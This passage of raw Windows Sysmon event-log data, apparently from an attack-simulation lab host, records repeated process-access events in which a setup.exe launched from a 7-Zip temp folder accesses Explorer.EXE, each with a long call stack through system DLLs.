13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.099{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.083{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.d